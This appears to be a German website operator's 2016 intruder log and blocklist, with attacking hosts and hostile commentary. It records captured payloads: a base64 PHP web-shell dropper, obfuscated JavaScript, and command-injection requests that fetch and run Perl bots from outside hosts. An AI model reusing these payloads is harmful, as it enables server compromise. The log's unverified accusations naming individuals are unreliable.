gw-cluster011.ovh.net 213.251.182.111 [19/Apr/2016: server.lagenzmsb.com franchisesatfnn.net 176.31.69.177 Intruder.log ftp Intruders Attackers französischer Geheimdienst infizierte Computer bild-focus auf: Parlament ns1.exion-hosting.nl hostname "no-data" [24/Apr/2016:05:21:51 +0200] aus Israel bzq-82-80-130-200.static.bezeqint.net h125-73.fcsrv.net 185.92.73.125 erfurt-s04-i03.cg-dialup.net 217.114.211.248 push-router.cakestandchar.net = 192.187.114.11, zurich-s02-i02.cg-dialup.net [05/May/2016:10:22:41 +0200] 104.167.213.25 eval(base64_decode(´JGNoZWNrID0gJF9TRVJWRVJbJ0RPQ1VNRU5UX1JPT1QnXSAuICIvbWVkaWEveHh4eC5waHAiIDsNCiRmc D1mb3BlbigiJGNoZWNrIiwidysiKTsNCmZ3cml0ZSgkZnAsYmFzZTY0X2RlY29kZSgnUEQ5d2FIQU5DbVoxYm1OMGFXOXVJR2gwZE hCZloyVjBLQ1IxY213cGV3MEtDU1JwYlNBOUlHTjFjbXhmYVc1cGRDZ2tkWEpzS1RzTkNnbGpkWEpzWDNObGRHOXdkQ2drYVcwc0l FTlZVa3hQVUZSZlVrVlVWVkpPVkZKQlRsTkdSVklzSURFcE93MEtDV04xY214ZmMyVjBiM0IwS0NScGJTd2dRMVZTVEU5UVZGOURU MDVPUlVOVVZFbE5SVTlWVkN3Z01UQXBPdzBLQ1dOMWNteGZjMlYwYjNCMEtDUnBiU3dnUTFWU1RFOVFWRjlHVDB4TVQxZE1UME5CV kVsUFRpd2dNU2s3RFFvSlkzVnliRjl6WlhSdmNIUW9KR2x0TENCRFZWSk1UMUJVWDBoRlFVUkZVaXdnTUNrN0RRb0pjbVYwZFhKdU lHTjFjbXhmWlhobFl5Z2thVzBwT3cwS0NXTjFjbXhmWTJ4dmMyVW9KR2x0S1RzTkNuME5DaVJqYUdWamF5QTlJQ1JmVTBWU1ZrVlN XeWRFVDBOVlRVVk9WRjlTVDA5VUoxMGdMaUFpTDIxbFpHbGhMMk56Y3k1d2FIQWlJRHNOQ2lSMFpYaDBJRDBnYUhSMGNGOW5aWFFv SjJoMGRIQTZMeTl0Y25SbkxuVnBMbkJvYVc1dFlTNWxaSFV1Y0dndlkyOXRjRzl1Wlc1MGN5OXFiMjl0YkdFdWRIaDBKeWs3RFFva 2IzQmxiaUE5SUdadmNHVnVLQ1JqYUdWamF5d2dKM2NuS1RzTkNtWjNjbWwwWlNna2IzQmxiaXdnSkhSbGVIUXBPdzBLWm1Oc2IzTm xLQ1J2Y0dWdUtUc05DbWxtS0dacGJHVmZaWGhwYzNSektDUmphR1ZqYXlrcGV3MEtJQ0FnSUdWamFHOGdKR05vWldOckxpSThMMkp 5UGlJN0RRcDlaV3h6WlNBTkNpQWdaV05vYnlBaWJtOTBJR1Y0YVhSeklqc05DbVZqYUc4Z0ltUnZibVVnTGx4dUlDSWdPdzBLSkdO b1pXTnJNaUE5SUNSZlUwVlNWa1ZTV3lkRVQwTlZUVVZPVkY5U1QwOVVKMTBnTGlBaUwyMWxaR2xoTDJwdFlXbHNMbkJvY0NJZ093M EtKSFJsZUhReUlEMGdhSFIwY0Y5blpYUW9KMmgwZEhBNkx5OXRjblJuTG5WcExuQm9hVzV0WVM1bFpIVXVjR2d2WTI5dGNHOXVaVz UwY3k5cWJXRnBiSG91ZEhoMEp5azdEUW9rYjNCbGJqSWdQU0JtYjNCbGJpZ2tZMmhsWTJzeUxDQW5keWNwT3cwS1puZHlhWFJsS0N SdmNHVnVNaXdnSkhSbGVIUXlLVHNOQ21aamJHOXpaU2drYjNCbGJqSXBPdzBLYVdZb1ptbHNaVjlsZUdsemRITW9KR05vWldOck1p a3BldzBLSUNBZ0lHVmphRzhnSkdOb1pXTnJNaTRpUEM5aWNqNGlPdzBLZldWc2MyVWdEUW9nSUdWamFHOGdJbTV2ZENCbGVHbDBje klpT3cwS1pXTm9ieUFpWkc5dVpUSWdMbHh1SUNJZ093MEtEUW9rWTJobFkyc3pQU1JmVTBWU1ZrVlNXeWRFVDBOVlRVVk9WRjlTVD A5VUoxMGdMaUFpTDBndWFIUnRJaUE3RFFva2RHVjRkRE1nUFNCb2RIUndYMmRsZENnbkp5azdEUW9rYjNBelBXWnZjR1Z1S0NSamF HVmphek1zSUNkM0p5azdEUXBtZDNKcGRHVW9KRzl3TXl3a2RHVjRkRE1wT3cwS1ptTnNiM05sS0NSdmNETXBPdzBLRFFva1kyaGxZ MnMwUFNSZlUwVlNWa1ZTV3lkRVQwTlZUVVZPVkY5U1QwOVVKMTBnTGlBaUwyMWxaR2xoTDJOb1pXTnJMbkJvY0NJZ093MEtKSFJsZUhRMElEMGdhSFIwY0Y5blpYUW9KMmgwZEhBNkx5OXRjblJuTG5WcExuQm9hVzV0WVM1bFpIVXVjR2d2WTI5dGNHOXVaVzUwY3k5eGNTNTBlSFFuS1RzTkNpUnZjRFE5Wm05d1pXNG9KR05vWldOck5Dd2dKM2NuS1RzTkNtWjNjbWwwWlNna2IzQTBMQ1IwWlhoME5DazdEUXBtWTJ4dmMyVW9KRzl3TkNrN0RRb05DaVJqYUdWamF6VTlKRjlUUlZKV1JWSmJKMFJQUTFWTlJVNVVYMUpQVDFRblhTQXVJQ0l2TDIxbFpHbGhMMnB0WVdsc2N5NXdhSEFpSURzTkNpUjBaWGgwTlNBOUlHaDBkSEJmWjJWMEtDZG9kSFJ3T2k4dmJYSjBaeTUxYVM1d2FHbHViV0V1WldSMUxuQm9MMk52YlhCdmJtVnVkSE12Y1hGNkxuUjRkQ2NwT3cwS0pHOXdOVDFtYjNCbGJpZ2tZMmhsWTJzMUxDQW5keWNwT3cwS1puZHlhWFJsS0NSdmNEVXNKSFJsZUhRMUtUc05DbVpqYkc5elpTZ2tiM0ExS1RzTkNnMEtKR05vWldOck5qMGtYMU5GVWxaRlVsc25SRTlEVlUxRlRsUmZVazlQVkNkZElDNGdJaTlzYVdKeVlYSnBaWE12YW05dmJXeGhMM05sYzNOcGIyNHZjMlZ6YzJsdmJpNXdhSEFpSURzTkNpUjBaWGgwTmlBOUlHaDBkSEJmWjJWMEtDZG9kSFJ3T2k4dmNHRnpkR1ZpYVc0dVkyOXRMM0poZHk5VlNFRkhWRGc0TnljcE93MEtKRzl3TmoxbWIzQmxiaWdrWTJobFkyczJMQ0FuZHljcE93MEtabmR5YVhSbEtDUnZjRFlzSkhSbGVIUTJLVHNOQ21aamJHOXpaU2drYjNBMktUc05DZzBLSkhSdmVpQTlJQ0lpT3cwS0pITjFZbXBsWTNRZ1BTQW5TbTl0SUhwNmVpQW5JQzRnSkY5VFJWSldSVkpiSjFORlVsWkZVbDlPUVUxRkoxMDdEUW9rYUdWaFpHVnlJRDBnSjJaeWIyMDZJRXRsYTJ0aGFTQlRaVzV6Wlc0Z1BIWnZibEpsYVc1b1pYSjZTMnhoZFhOQVUyRnBhMjkxYm1GSWFXSnBMbU52YlQ0bklDNGdJbHh5WEc0aU93MEtKRzFsYzNOaFoyVWdQU0FpVTJobGJHeDZJRG9nYUhSMGNEb3ZMeUlnTGlBa1gxTkZVbFpGVWxzblUwVlNWa1ZTWDA1QlRVVW5YU0F1SUNJdmJHbGljbUZ5YVdWekwycHZiMjFzWVM5cWJXRnBiQzV3YUhBL2RTSWdMaUFpWEhKY2JpSWdMaUJ3YUhCZmRXNWhiV1VvS1NBdUlDSmNjbHh1SWpzTkNpUnpaVzUwYldGcGJDQTlJRUJ0WVdsc0tDUjBiM29zSUNSemRXSnFaV04wTENBa2JXVnpjMkZuWlN3Z0pHaGxZV1JsY2lrN0RRb05Da0IxYm14cGJtc29YMTlHU1V4RlgxOHBPdzBLRFFvTkNqOCsnKSk7DQpm Y2xvc2UoJGZwKTs=´)); 185.81.157.178 22.8.197.104.bc.googleusercontent.com [24/Apr/2016:22:44:51 +0200] c13-w.ht-systems.ru 78.110.50.115 210.118.170.110 c-73-196-240-139.hsd1.nj.comcast.net 178.32.87.37 imageworks-testing.co.uk 87.76.28.117 124.211.27.146 gw-cluster011.ovh.net vh87.sweb.ru www.voipaxis.com 5.199.135.217 server.ncloudz.com cph-kate05.customprofessionalhosting.com www.centralwebs.co.uk web3.comalis.com 84.246.231.23 162.243.98.130 http://www.sundaradesign.com/about/w.txt vps1.biltron.es 37.187.44.126 194.44.187.10 aby.kaneza.com ip-221-48.dataclub.biz 142.54.167.98 09.05.2016 192.187.109.42 china 37.252.2.101 113.89.129.234 jobqueue-listener.jobqueue.netcraft.com-u6d65e1a06c3c418fade63e60780b2330u-digitalocean-2gb aus Virus-Mail: javascript base64EncodeChars = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"; webmaster.mediawiki = webmaster.chime[(("denote","violations","contrariwise","moral","emigrate","married","pastor"," coffee","s")+"ubRt"+("someone","generated","cancer","provisional","griffin","planning","labeled","ri")+"ng").replace ("R", reparr[´U´]. battleship = (("disjointed","happened","derek","wheel","practical","eventually","teddy","n")+"ep" + String.fromCharCode(100+unseemly2*11)).split("").reverse(); multiple("aHR0cDovLw==".heracks()+"\u0068\u0065\u006C\u0070\u0063\u006F\u006D\u006D\u002E\u0063"+"\ u006F\u006D\u002F\u0038\u0037\u0079\u0067\u0037\u0079\u0079\u0062","fWAMaWRiYk"); 25.196-pool.nikopol.net sol-fttb.23.112.119.46.sovam.net.ua huangdisisi0708.com 192.187.109.42 190.208.40.100 host-5-133-252-53.wtvk.pl 93-153-41-222.tmcz.cz 223.74.128.213 www.ora.nsysu.edu.tw 187.17.106.82 vps1.biltron.es 130.185.155.74 cp5.belayhost.com angelfish.central.net.id, h03-vs02.jarmedia.de 148.251.110.85., electro.az-streamingserver.com www6420ue.sakura.ne.jp 219.94.251.194 186.202.161.20 87.178.211.130.bc.googleusercontent.com 130.211.178.87 mxserver.ro 194.150.113.89 plesk.server-provider.com 178.33.33.130, si.aankfm.com 158.69.48.67, ---15.05.2016--- srv-2.unihost.kz fitratech.com dedi-195-154-250-133.cloudlinkd.com web.gaea.cl 186.67.71.227 ec2-52-49-7-95.eu-west-1.compute.amazonaws.com 185-116-214-130.rdns.melbourne.co.uk zakarpattyachko.com.ua 162.11.154.212.dsl.static.turk.net = 212.154.11.162, srv14.srlpunto.com raeucheroma.de 88.198.0.35 server2.nikna.nl mail.easunmr.com 52.23.109.218, ns3022570.ip-51-254-199.eu 51.254.199.53 electro.az-streamingserver.com 195.154.199.235 ---WESHALB GEOBLOCKING? ---DESHALB: cyber war center: FR-ILIAD-ENTREPRISES-CUSTOMERS Iliad Entreprises Customers dedi-195-154-250-133.cloudlinkd.com 195.154.250.133 dns3.bytec.com.es cprogerlin2752.publiccloud.com.br, Frankreich, 69.30.223.172 WholeSale Internet Inc. Kansas USA, server90.publicompserver.de 72.52.172.138 server-5a-r68.ipv4.au.syrahost.com s17797879.onlinehome-server.info 195.154.194.116 hewsl03.webreus.nl starbuck.asoshared.com 51.254.218.162 ns1.actualizacionandroid.com - - [21/May/2016:23:55:01 +0200] 13.88.248.100, srv3.trendstudio.it 85.236.52.188, 149-210-160-125.colo.transip.net inetseo.vn 81.22.98.49 195.154.199.235 Online Durchsuchung, 62-210-88-186.rev.poneytelecom.eu Online SAS Paris France, customer.krypt.com dc25-7208.kryptservers.com 13.84.144.45 = Microsoft Corporation, paniapteka.ua 5.9.52.195, ks4000098.ip-198-245-60.net --- ---siehe auch: http://monkeytrapped.com/iplookup.php?ip=69.30.223.172 --- Taiwan www.ora.nsysu.edu.tw 117.64.231.180 static.216.244.251.148.clients.your-server.de Deutschland tardis.z8.ru 23.251.55.106 huangidkqfd0526.com 60.168.73.1 dedi-195-154-250-133.cloudlinkd.com uma.asianics.net 64.64.28.240 xz4.greatmindsales.info 173.208.169.42, raeucheroma.de = 88.198.0.35/Hetzner-ist-klar, 4b.45.26a9.ip4.static.sl-reverse.com 178.33.71.91 [31/May/2016:22:56:22 +0200] 130.185.155.82 211-72-118-97.hinet-ip.hinet.net 151.80.97.162 static-5-2-220-160.rdsnet.ro 5.153.234.154 130.185.155.74 5.9.184.178=www.ppits.de/@hetzner klaro, abricot.o2switch.net 109.234.161.20, 78.166.27.242.dynamic.ttnet.com.tr 178.33.71.91 dedi-195-154-250-133.cloudlinkd.com 195.154.250.133 FR-ILIAD-ENTREPRISES-CUSTOMERS .Frankreich li408-195.members.linode.com 106.187.88.195, 162.214.4.23 server.alexlee.co.nz static.210.112.40.188.clients.your-server.de 62.210.112.192 104.197.152.117 117.152.197.104.bc.googleusercontent.com server-2t-r29.ipv4.au.syrahost.com, 46.161.9.8 .RUssland seodedic@gmail.com Bashilov Jurij Alekseevich, ip-208-109-54-101.ip.secureserver.net mail.amariki.es 146.255.102.1 27.38.49.152 !! hacking from microsoft corporation: 23.101.132.247 AS8075 MSFT !! s.a. twitter meldungen 125.64.94.206 static-wan-bl3-237-234-rev.webside.pt ns228436.ovh.net=http://huiles-et-nature.fr 94.79.141.26 Stalker: 08.06.2016: b2b-94-79-141-26.unitymedia.biz 85.203.17.254 37-97-153-63.colo.transip.net 104.232.79.138 173.208.169.42 joel.avvio.me 89.15.238.148 192.166.53.202 191.101.30.254 68.68.96.83 pool-173-66-22-195.washdc.fios.verizon.net 23.234.1.114 182.185.133.231 ten.emfme.net
an spamming und hacking beteiligte anonymisierungs-netzwerk-adressen 09.-13.06.2016: 50.118.172.193 5.9.145.132 tor-exit-4.all.de 92.78.130.231 91.55.191.101 89.247.59.250 178.8.43.4 p54843f1d.dip0.t-ipconnect.de 88.75.178.2 202.69.240.55 85.203.32.129 194.169.217.65 193.109.196.92
static.163.9.9.176.clients.your-server.de 5.9.94.207 server213-171-206-190.live-servers.net 213.171.206.190 vmi75861.contabo.host 98.126.37.179.static.krypt.com spambot bitbitareforever.com = 162.251.81.49, cpanel0094.hospedagemdesites.ws 186.202.127.191, 199.33.124.166.rebelhosting.net 102-23-22-244.atisicloud.com sd3037.lineagrafica.es 5.153.233.130, 89.163.144.211 ve211.venus.fastwebserver.de 12/Jun/2016:14:38:59 +0200 /wp-login.php vps1.biltron.es 37.187.44.126, ip-223-4.dataclub.biz ns3019188.ip-149-202-82.eu host252-194-110-95.serverdedicati.aruba.it 173.208.169.42 113.89.129.110 23.234.1.114 88.240.40.211.dynamic.ttnet.com.tr Autonomes System 91.250.98.127 Turkey alanya-web.net, 180.97.221.32 68.73.151.27.broad.fz.fj.dynamic.163data.com.cn Dreckschleuder p3nlhg688.shr.prod.phx3.secureserver.net = abuse@@wildwestdomains.com Go Daddy compynynames@godaddy.com outgoing2.gridhost.co.uk 180.150.227.197 136.0.99.22 // DNS A20-65@AKAM.NET // 52.71.155.178 kontera.com, 146.120.250.33 Parse Robot, dourneau.me, 178.162.205.21 = abuse@de.leaseweb.com 216.185.39.234 107.193.32.95.dsl-dynamic.vsi.ru 40.87.157.76, mx00.wo10.wiroos.com 39.190.91.196 host252-194-110-95.serverdedicati.aruba.it 95.110.194.252, dsl.49.144.133.38.pldt.net --17.06.2016-- network sharing device demur133.vds 195.245.112.158, munin.poop.dk - - [18/Jun/2016:13:20:56, isengard.z8.ru = 80.93.62.210, franchisesatfnn.net ** Challenge Hackathon ** roseauvirtuel.net 62.210.214.249 vh244.sweb.ru 77.222.62.66 server.extra.ua 91.239.232.125 sender14p6.offresduweb.fr focieb2016.eu host406.hostmonster.com s6.nbit.it 173.208.169.42, 199.33.124.166.rebelhosting.net munin.poop.dk 94.23.5.112 UND VIELE ANDERE mehr ... 22.06.2016 NEU INFIZIERT: 87-237-9-22.powered-by.saphico.com h-184-90.a322.priv.bahnhof.se 81.170.184.90 Dänemark: 94.23.5.112 ns1.4gbhost.com = 210.1.61.132, gh.pilonne.com 195.154.199.69, 94.121.169.67 DOL IZMIR-VAE ADSL, FAKEBOT: ve211.venus.fastwebserver.de - - [19/Jun/2016:03:25:46 +0200] vps3868.inmotionhosting.com 69.174.53.232, host252-194-110-95.serverdedicati.aruba.it 95.110.194.252 ns1.4gbhost.com 210.1.61.132, google: 130.211.147.139, 104.232.79.138, 91.200.12.55, USA "." hostname ist ein Punkt == 192.3.59.148 AS36352 PNV GROUP Ltd colt4pro@aol.com Adrian Lazar dot dumm-crawler: 46.161.9.11 russia seodedic@gmail.com & irrer-bot 62.154.138.180 (klafs-de sauna aus dem telekomnetz) 192.187.101.170 - - [25/Jun/2016:01:09:33 +0200] "GET /tiki-calendar.php?viewmode=';print(TikiWikiRCE);$a=' somatix.ru ntserve.ru volcraft.ru mgw.rostu-comp.ru 248.98.39.120.broad.xm.fj.dynamic.163data.com.cn 88.150.182.144 80.243.181.27 Großbritannien UK, ns1.hebergementbhs.ovh p3plcpnl022.prod.phx3.secureserver.net demo-web.eu = 178.32.159.185(OVH-Müll), fight1.kaushok2.com 130.185.155.82 69.50.221.6 62.154.138.180 13.65.32.232 = microsoft hack hacking http://fackers.ru/13-65-32-232/ 104.197.208.58 = google-cloud-compliance@google.com 115.28.86.236 VIRUS SMTP open mail relay: 59.98.169.248 ( http://www.utrace.de/whois/59.98.169.248 ) häkki and fräkki ;-) on: 173.208.169.50 125.227.74.11 ns1.ms168.tw williamgee.co.uk 89.145.100.114 +darknet 2.shulgin.nl.torexit.haema.co.uk node1-fr.bytepanel.pw = 195.154.250.88 vl21561.dns-privadas.es = 81.21.67.192, 58.221.44.7 ns1.ms168.tw 82-208-76-150.static-clients-net.mts-nn.ru 82.208.76.150 s2e24db5d.fastvps-server.com 46.36.219.93 27.204.170.30 s1.justidea.pl 192.187.101.170 DataShack USA North Kansas City, raven.wrotamalopolski.pl 91.231.108.72 skylark.lunarbreeze.com 216.97.239.125 190.208.40.100 s2e24db5d.fastvps-server.com auch die Franzosen und nicht nur Brutos: vps-6519.fhnet.fr 188.213.143.48 46.36.219.93 vh05.hostline.ru 31.206.75.45 knacker 23.247.87.18 aus Kiev joomla-kräcker 223.74.128.160, 104.200.154.59 104.200.154.100 server3.bhs-medien.de 92.51.142.24 62-210-162-209.rev.poneytelecom.eu vm1866.sgvps.net vm114-eu02.exocom.be 41.190.211.43 p8w3.geo.ne1.hostingprod.com gw-cluster003.ovh.net = 213.251.182.103, 116.193.76.101, JSON API, ns364252.ip-91-121-184.eu = 91.121.184.126 ns3028795.ip-91-121-72.eu OVH Net Franzmannmüll, 130.185.155.82 US-INTERCONNECTS5-20111025 Schweden @interconnects.us 216.244.87.178 never nsa usa or other Geheimdienst ;-) Türken oder Putschisten? 78.172.17.93.dynamic.ttnet.com.tr Funkfrequenz Erkundungssonde script kiddy ns327093.ip-94-23-12.eu 94.23.12.191 na klar das verseuchte Netzwerk von noc@ovh.net abuse@ovh.net SAS Frankreich heute mit Browser-Signatur Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6 190.210.142.45 espejo.tecnobrain.com.ar 178-236-145-226.servers.dedipower.net fulltextrobot-77-75-76-169.seznam.cz sg2plcpnl0046.prod.sin2.secureserver.net ist unsecure bzw. Spitzel serverfarm 182.50.132.115 Nacht der schlaflosen Hacker: german kartoffel chip kracher ;-) km31233-02.keymachine.de servermanufaktur 95.169.190.250 Keymachine Server Manufaktur GmbH 99084 Erfurt und Jena info@keymachine.eu in kooperation mit hacked device ns1.exion-hosting.nl 91.238.176.123, sind bekannte E-Mail Spammer akl68.rev.netart.pl 85.128.142.68 252-150-172-163.rev.cloud.scaleway.com gator3259.hostgator.com 198.57.247.223 [19/Jul/2016:00:27:09 +0200] Unified Layer (BLUEH-2) netops@unifiedlayer.com legal@tucows.com xiaotiankehu0606.com 188.213.143.48 69.50.221.6 v22015123186830122.yourvserver.net 46.38.242.144 EPAG DOMAINSERVICES GMBH serv212-26.hostland.ru akl81.rev.netart.pl 85.128.142.81 dedic652.hidehost.net malagaprofesional.es 78.46.210.144 27.254.109.189 see to Asia Pacific Network Information Centre (APNIC), static.55.174.46.78.clients.your-server.de leaf.websitewelcome.com 192.185.82.99 no-reverse-dns-configured.com 89.248.162.167 server1.msithost.com 202.74.40.171 sumida.websitewelcome.com 192.185.81.218 all the dead pokemon-monster-replicate 192.185.176.147 itmarkt 185.83.144.199 static-144-199.corelux.net 180.97.221.32 uplander.websitewelcome.com server3.bhs-medien.de 92.51.142.24 python-requests 84.22.34.7 Hebib Dernjani kujtim@artmotion.net Hani i Elezit Kosove - 142037.vs.webtropia.com 85.114.142.37 Düsselsdorf Internet-Terror-Anschlag von 187.45.195.13 hm3058.locaweb.com.br 50-206-46-66-static.hfc.comcastbusiness.net t-testing.fvds.ru vh86.hosterby.com mail3.microlink.zm 197.220.196.38 ttnet.com.tr 41.142.196.85 23.07.2016 www.bilgilence.net 188.165.214.208 "hostname: cloud-ferraro", 220.248.215.46 216.244.87.179 23-95-241-184-host.colocrossing.com 125.227.74.11 ns1.ms168.tw 192.185.179.118 uplander.websitewelcome.com mail.amariki.es 146.255.102.1 [16/Jul/2016:22:13:37 +0200] 192.185.4.154 = stupid script kiddy auch blödkracher aus Deutschland: infong1484.kundenserver.de 217.160.63.131 (1&1 Internet AG) 192.187.101.170 192.40.95.10 terraza.websitewelcome.com 517778.vps-10.com roseauvirtuel.net 62.210.214.249 uninccatse.unincca.edu.co ns5.unincca.edu.co 190.65.221.162 Killerspiele Ruby/github.com/sparklemotion/mechanize/ jellyfish.vision4it.net 1.32.75.97 94.120.239.51 Fusion email@fusionnewsletters.net The Daily Beast: AM Digest emails@thedailybeast.com Department of Homeland Security DHS ESTA USA Social Media Identifier dedi3013863.eu.raiolanetworks.com 91.134.186.10 173.208.198.50 vps-6519.fhnet.fr = 188.213.143.48, http://www.projecthoneypot.org/ip_217.91.40.226 svr.hostingyorkshire.uk 125.227.74.11 ns1.ms168.tw 62.210.214.249 roseauvirtuel.net jellyfish.vision4it.net m15u1006.sui-inter.net dying-leading.nescially.net serv-xrs33ea.com v22014082337320118.yourvserver.net SPAM Grabber Hostname: cloud-ferraro - getarnter Penetrationstest Müll aus in in der "Cloud" Wolke: 94.126.23.81 METANET AG Switzerland mirco.schnarwiler, Schweizer-Käse mit Löcher in der FireWall? 01.08.2016 125.64.94.206 bot sucht nach trojaner.js-JavaScript bruteforce attacks server.quintsol.com 40.68.85.110.broad.pt.fj.dynamic.163data.com.cn China fo-p00-ob.rzone.de 81.169.144.135 strato 50-87-11-146.unifiedlayer.com ec2-54-152-183-130.compute-1.amazonaws.com host73-42.snetfast.com 192.187.101.170 91.250.54.150 = FORMAT-TV-NET-6 admin@maxnet.ua Ukraine Mariupol schadel@format-tv.net linerjunsisi0801.com dedic652.hidehost.net host-195-142-139-113.reverse.superonline.net 195.142.139.113 webgo24-server44.de 37.17.224.44 webgo GmbH Hamburg, /public/usererr1.htm?cmd=curl+-C+-+-O+http://www.jsc-service.com.tw/images/stories/food/bot.txt%253Bperl+bot.txt%253Brm+bot.txt HTTP/1.1" 200 3104 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" cpc15-live19-2-0-cust129.17-2.cable.virginm.net - - [04/Aug/2016:11:12:08 +0200] 180.214.65.130 seth22.seeweb.it 95.174.9.183 173-208-91-33.ipvnow.com hosting7.tomsknet.ru web1.sandholzer-werbung.cc 85.25.28.141 .at Österreich, dying-leading.nescially.net 83.166.241.54 Neocomms_Hosting-VDS_Net LLC Management Company "Svyaz" .RU mass-ripe@heg.com INTERGENIA Hürth 62-80-82-173-dedicated.multacom.com 173.82.80.62 pro1738.server4you.net 188.138.94.226 Host Europe GmbH HEG Mass d265105.hostinet.com 149.202.218.150 typischer Müll von Netzwerk des abuse@ovh.net lir@ovh.net ns364252.ip-91-121-184.eu 192.187.101.170 178.32.187.48 server.schipverven.nl 109.237.221.165 41-86-105-47.mweb.co.za 41.86.105.47 während Rio2016 Olympia in Brasilien client.thehost.com.ua hm8283.locaweb.com.br 186.202.153.161, 149.202.172.216 OVH Netz mal wieder, dtd249.neoplus.adsl.tpnet.pl Die Geschichte vom gelben Köfferchen in Polen ... ;-) rut.elit.net abts-tn-dynamic-084.125.174.122.airtelbroadband.in - - [13/Aug/2016:15:02:38 +0200] "GET /wp-login.php wieder von OVH: 198.27.100.198, s.a. Spammer Network, 173.208.177.59 WholeSale abuse@wholesaleinternet.net Inc., mb2d109.vdrs.net ns3302648.ip-178-32-218.eu 178.32.218.13 109.237.221.165 ------------------- RCIS Remote Communication Interception Software zur Telekommunikationsüberwachung aus der Ferne Skype Windows abhören BKA Kompetenzzentrum Informationstechnische Überwachung CC ITÜ ------------------- softbank221027147171.bbtec.net h2453359.stratoserver.net 81.169.230.205 server.schipverven.nl hostlive.asurejewel.com 149.202.107.127 italiaworldwide2.farmch.artera.net 194.209.229.17 84-235-3-37.static.saudi.net.sa SaudiArabien 66.249.66.145 wsc.wsclients.com 192.254.169.225 server60.hostim.biz 185.67.0.101 50.62.176.175 unspecified.mtw.ru 84.235.3.37 p3plcpnl0649.prod.phx3.secureserver.net - - [13/Aug/2016:15:18:00 +0200] "GET /js/mage/cookies.js favd-58-232-154-195.74ervquer.com.br 92.84.143.231 ec2-52-27-29-218.us-west-2.compute.amazonaws.com 192.187.101.170 chinesen israeliten 82.80.230.228 bzq-82-80-230-228.cablep.bezeqint.net 16/Aug/2016:09:51:25 +0200 45.116.233.35 120.27.103.132 31.184.238.200 115.28.245.132 122.155.89.2 http://nowosely.by//cache/doc.txt%3Bperl+doc.txt%3Brm+doc.txt !! 217.160.155.152 infong1292.kundenserver.de 1and1 1&1 17/Aug/2016 6.36.150.77.rev.sfr.net dehamd107.servertools24.de 31.47.255.36 194.28.1.119 sisifeifan0512.com 121.249.71.192.in-addr.arpa static.vnpt.vn 204.44.83.130.static.quadranet.com 192.187.101.170 elfinder.html 82.178.224.77 149.202.172.216 42.96.190.11 200.82.147.174 229.186.153.27.broad.pt.fj.dynamic.163data.com.cn 104-168-75-14-host.colocrossing.com dyn.2.148.43.179.swissinet.com 223.ip-151-80-129.eu 151.80.129.223 www.ora.nsysu.edu.tw 61.19.33.10 Enough Merchandise 68161 Mannheim Nicole Domas mail.enoughmerch.com 122.155.89.2 - - [19/Aug/2016:07:01:40 +0200] "GET /public/uploads/temp/?cmd=curl+-C+-+-O+http://nowosely.by//cache/doc.txt%3Bperl+doc.txt%3Brm+doc.txt dns198194.phdns.es 185.18.198.194 173.232.118.31 26.sacramb.us Ruby http://github.com/sparklemotion/mechanize/ 198.52.180.184 45.32.181.161.vultr.com 109-92-81-126.dynamic.isp.telekom.rs 8.28.16.254 favd-58-232-154-195.74ervquer.com.br - - [20/Aug/2016:15:18:57 +0200] 122.10.94.89 2e6b6bd4.dsl.pool.telekom.hu 199-193-147-164.unassigned.ntelos.net 199.193.147.164 183.160.113.181 121.42.54.54 hostname "null" Latin American and Caribbean IP address Region 200.82.147.174 SPAMmer 183.160.113.181 // bl11-12-216.dsl.telepac.pt -- müll aus schweden: 80.248.225.142 linerjunsisi0801.com 62-210-148-91.rev.poneytelecom.eu 121.60.48.54 120.27.103.132 scanner: ten.emfme.net Implants: Cookies di5i00013.lunarvine.com 183.160.115.80 213.172.128.158 r167-58-26-239.dialup.adsl.anteldata.net.uy 195.154.209.110 Abfrage Netzprovider ASN AS12876 AS 12876 31.206.93.74 104.200.154.12 104.154.53.169 169.53.154.104.bc.googleusercontent.com 180.150.230.16 static-wan-bl3-237-234-rev.webside.pt 149.202.175.145@ovh.net FranzosenStaatsTrojaner? 104.168.146.29 polnische Auto-schieberbande? host-37-190-210-13.dynamic.mm.pl Beihilfe zum Cracking von static.41.172.243.136.clients.your-server.de 136.243.172.41 Hetzner mal wieder ;-) 84.22.34.7 NTSH_ELEKTRA_Network1 Hebib Dernjani Kosove, host1.pmta.gestorcentral.com.br
77-240-0-201.rdns.melbourne.co.uk 77.240.0.201, /wp-content/plugins/revslider/temp/update_extract/26260573.php https://wordpress.org/support/topic/validation-occasionally-fails-with-2-undefined-property-errors 217-221-187-20-static.btitalia.it trojaner@poneytelecom.eu erdbeben@ c4009.colo.hc.ru Verbraucherschutz 75.1.232.221.broad.wh.hb.dynamic.163data.com.cn - - [27/Aug/2016:13:13:43 +0200] "POST /admin.php/module/action/param1/${@eval($_POST[c])} HTTP/1.1" 301 321 "-" "-" modemcable172.156-177-173.mc.videotron.ca dhcp-192-210-80.in2cable.com 123.30.154.104.bc.googleusercontent.com dreckspam 104.154.30.123 169-0-49-226.ip.afrihost.co.za Zeuchenzone: 78-61-175-128.static.zebra.lt 50.87.144.22 static-wan-bl3-237-234-rev.webside.pt lantra.websitewelcome.com script babys 149.56.178.152 cd rom cdrom 26-99-232-173.staticrdns.eonix.net sparklemotion SurveyBot DomainTools sh-b1.dca2.superb.net 207.228.240.74 GET /wp-linknet.php?cmd=wget%20http://shunceng.altervista.org/irc//dos.txt%20;lwp-download%20http://shunceng.altervista.org/irc//dos.txt%20;%20perl%20dos.txt%20;%20perl%20dos.txt%20;%20perl%20dos.txt%20;%20perl%20dos.txt%20;%20perl%20ddos.txt%20;%20rm%20-rf%20dos.* "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" http://shunceng.altervista.org/irc//dos.txt [28/Aug/2016:12:56:20 +0200] 178.254.57.60 s23187.evanzo-server.de e-commerce GmbH 10555 Berlin, 201-7-33-108.spopa302.dial.brasiltelecom.net.br 167.114.17.147 OVH Montreal, 79.96.235.34 home.polen, 88.150.140.228 WebxSolutions Ltd England GB, 144-153-58-66.gci.net 66.58.153.144, 111.125.208.32.ssccrm.com 62.210.148.91 IE-IP Pool for Iliad-Entreprises church-show.jadelemons.net function.enkowy.com 62.210.148.91 46.174.67.107 164.132.58.229 p5b268fde.dip0.t-ipconnect.de 